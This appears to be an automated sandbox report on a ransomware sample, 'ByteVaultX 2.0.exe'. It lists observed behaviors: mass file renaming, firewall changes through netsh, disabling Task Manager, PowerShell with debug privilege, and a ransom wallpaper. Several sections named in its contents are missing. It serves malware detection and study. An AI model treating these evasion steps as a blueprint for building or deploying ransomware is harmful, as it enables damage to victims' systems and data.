Malware Analysis Report

2025-06-15 20:56

Sample ID 240525-3qg92sfe54
Target ByteVaultX 2.0.exe
SHA256 1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5
Tags
evasion execution ransomware pyinstaller
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5

Threat Level: Known bad

The file ByteVaultX 2.0.exe was found to be: Known bad.

Malicious Activity Summary

evasion execution ransomware pyinstaller

Renames multiple (132) files with added filename extension

Renames multiple (156) files with added filename extension

Renames multiple (142) files with added filename extension

Modifies Windows Firewall

Blocklisted process makes network request

Disables Task Manager via registry modification

Checks computer location settings

Loads dropped DLL

Drops desktop.ini file(s)

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Sets desktop wallpaper using registry

Drops file in Windows directory

Unsigned PE

Detects Pyinstaller

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 23:42

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 23:42

Reported

2024-05-26 00:00

Platform

win10v2004-20240508-en

Max time kernel

970s

Max time network

975s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (142) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
